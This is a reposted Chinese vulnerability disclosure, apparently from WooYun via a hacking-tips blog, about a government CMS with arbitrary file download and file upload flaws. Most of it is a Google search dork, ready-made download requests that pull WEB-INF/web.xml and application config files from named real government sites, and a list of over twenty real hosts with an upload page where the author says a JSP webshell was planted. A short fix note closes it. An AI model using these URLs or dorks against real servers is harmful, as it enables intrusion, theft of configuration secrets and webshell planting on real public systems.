记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

某政府通用CMS任意文件下载导致webshell

2014-08-30 20:50

ragecomic.png

漏洞证明:

google搜索找到的任意文件下载:inurl:upload/FileDownload.jsp

下载任意文件请求案例:

http://www.mzgtzy.gov.cn/cms/upload/FileDownload.jsp?id=020010040000092515&filepath=/WEB-INF/web.xml&downloadName=web.xml



通过百度搜索存在任意文件上传影响的站点:

http://www.gdlr.gov.cn/cms/weblawcase/impList.jsp (已经有人上传过jsp,不是我干的)

http://gtzyj.maoming.gov.cn/cms/weblawcase/impList.jsp

http://www.mzgtzy.gov.cn/cms/weblawcase/impList.jsp (这是我干的,请center验证后删除)

http://www.zqgtzy.gov.cn/cms/weblawcase/impList.jsp

都是mzgtzy的子域名,一个发布系统控制的。

http://fs.mzgtzy.gov.cn/cms/weblawcase/impList.jsp

http://wh.mzgtzy.gov.cn/cms/weblawcase/impList.jsp

http://xn.mzgtzy.gov.cn/cms/weblawcase/impList.jsp

http://py.mzgtzy.gov.cn/cms/weblawcase/impList.jsp

http://pl.mzgtzy.gov.cn/cms/weblawcase/impList.jsp

http://mx.mzgtzy.gov.cn/cms/weblawcase/impList.jsp

http://gl.mzgtzy.gov.cn/cms/weblawcase/impList.jsp



http://www.gdbsm.gov.cn/cms/weblawcase/impList.jsp

http://210.76.65.158/cms/weblawcase/impList.jsp

http://www.gddzxh.com/cms/weblawcase/impList.jsp

http://218.15.221.42/cms/weblawcase/impList.jsp

http://gddzxh.com/cms/weblawcase/impList.jsp

http://www.gdlric.gov.cn:8090/cms/weblawcase/impList.jsp



http://jyj.gzgtzy.gov.cn/cms/upload/FileDownload.jsp?id=025010550000000432&filepath=WEB-INF/config/applicationContexts-cms.xml&downloadName=web.xml(有任意文件下载漏洞,但是没找到上传)

http://www.hytudi.com/cms/upload/FileDownload.jsp?id=025010550000000432&filepath=WEB-INF/config/applicationContexts-cms.xml&downloadName=web.xml(有任意文件下载漏洞,但是没找到上传)

http://www.gdrsgis.org:8720/cms/weblawcase/impList.jsp

http://210.76.70.142/cms/weblawcase/impList.jsp(已经被某人上传了shell)

修复方案:

限制下载的目录,上传文件格式限制,后台各个页面有很多越权访问,请屏蔽


知识来源: www.wooyun.org/bugs/wooyun-2014-068728

阅读:312254 | 评论:0 | 标签:cms

想收藏或者和大家分享这篇好文章→复制链接地址

“某政府通用CMS任意文件下载导致webshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云